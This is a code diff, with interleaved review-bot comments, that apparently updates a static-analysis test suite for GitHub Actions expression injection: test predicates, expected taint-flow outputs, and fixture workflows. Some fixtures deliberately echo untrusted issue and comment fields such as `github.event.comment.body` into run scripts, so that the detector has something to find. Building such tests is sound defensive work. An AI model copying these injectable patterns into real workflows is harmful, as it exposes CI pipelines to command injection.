@@ -13,14 +13,18 @@ query predicate jobNodes(Job s) { any() } query predicate stepNodes(Step s) { any() } +query predicate runNodes(Run s) { any() } + +query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() } + query predicate allUsesNodes(Uses s) { any() } query predicate stepUsesNodes(UsesStep s) { any() } query predicate jobUsesNodes(UsesStep s) { any() } -query predicate usesSteps(Uses call, string argname, Expression arg) { - call.getArgument(argname) = arg +query predicate usesSteps(Uses call, string argname, AstNode arg) { + call.getArgumentExpr(argname) = arg } query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 51fb93146859..31e367ac3175 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected 
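Review bot: `usesSteps` now declares its result column as `AstNode arg` while binding it through `call.getArgumentExpr(argname)`; if that getter yields an expression node (its declared type is not visible here, but the new `runExprNodes` predicate already pairs `getAnExpression()` with `ExpressionNode`), the narrower `query predicate usesSteps(Uses call, string argname, ExpressionNode arg)` would let the compiler catch the API drifting back to a non-expression node instead of the test silently accepting any AST node. Widening to `AstNode` also reads like a workaround rather than intent, so a one-line comment stating what `getArgumentExpr` is expected to return would help the next person editing these test predicates. The hunk is a run of flat query predicates, so nothing continues outside it.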
@@ -1,15 +1,15 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:32:12:32:50 | echo ${ ... alue }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | Sink | -| action1/action.yml:35:12:35:51 | echo "H ... et }}." 
| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | Sink | +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 7bea4429e562..6540b1910682 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected 
@@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | 
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 6496731dd6bf..063a26bd6ef6 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected 
@@ -1,12 +1,12 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths #select -| action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | Summary | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index c9e26d368df7..a45b9acf416d 100644 
--- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,8 +1,8 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Sink | +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8d091b655479..2cabeaca9faa 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected 
@@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | nodes -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... 
put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index ae21052dcfe2..a6be99e1bd05 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... 
put1 }} | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | semmle.label | steps.step1.outputs.step-output | | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths #select -| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary | +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml index 17ead9fdd204..977dccc1b854 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml @@ -5,7 +5,9 @@ jobs: runs-on: ubuntu-latest steps: - run: | + Foo echo '${{ github.event.comment.body }}' + Bar echo-chamber2: runs-on: ubuntu-latest 
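Review bot: The added `Foo` and `Bar` lines carry no explanation, and as bare words rather than commands they look like leftovers; presumably they are there so `${{ github.event.comment.body }}` is no longer the first line of the `|` block scalar and the expression's line/column offset inside the script gets exercised (the CWE-094 expected-output hunk that would confirm the reported location starts later in this diff and runs past my view). A comment on the step such as `# Foo/Bar pad the script so the expression is not on the first line of the block scalar` would stop a future cleanup from deleting them. The `echo-chamber` job is fully inside the hunk; the rest of the workflow is not.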
@@ -25,4 +27,4 @@ jobs: script: console.log('${{ github.event.issue.body }}') - uses: actions/github-script@v3 with: - script: console.log('${{ github.event.issue.title }}') \ No newline at end of file + script: console.log('${{ github.event.issue.title }}') diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml index 0a64e47f6cba..8968f629dfba 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml @@ -7,4 +7,6 @@ jobs: runs-on: ubuntu-latest steps: - run: | - echo '${{ github.event.comment.body }}' + LINE 1 echo '${{ github.event.comment.body }}' + LINE 2 echo '${{github.event.issue.body}}' + LINE 3 echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 9d00212e3af4..c9ac215666f7 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
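Review bot: The three `LINE n echo '…'` lines only cover the literal (`|`) block-scalar form, where each `${{ … }}` gets its own span; the library test output earlier in this diff (expression_nodes.yml at `14:9:15:46`, and again at `20:14:21:46` for a quoted multi-line scalar) shows that inside a folded (`>`) or quoted multi-line scalar both `github.event.comment.body` and `github.event.issue.body` are given the whole scalar's span, so two injections there would be reported at one identical location. A second job in this fixture with `run: >` and two different event fields would make that coarser location visible in the CWE-094 expected output, which matters for anyone deduplicating alerts by location. `LINE 2` also omits the inner spaces in `${{github.event.issue.body}}`, presumably on purpose; a trailing `# no inner whitespace` comment would record that the spacing variant is intentional. The step is fully inside the hunk.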
@@ -1,260 +1,261 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... 
_url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... 
env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... 
value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| 
.github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| 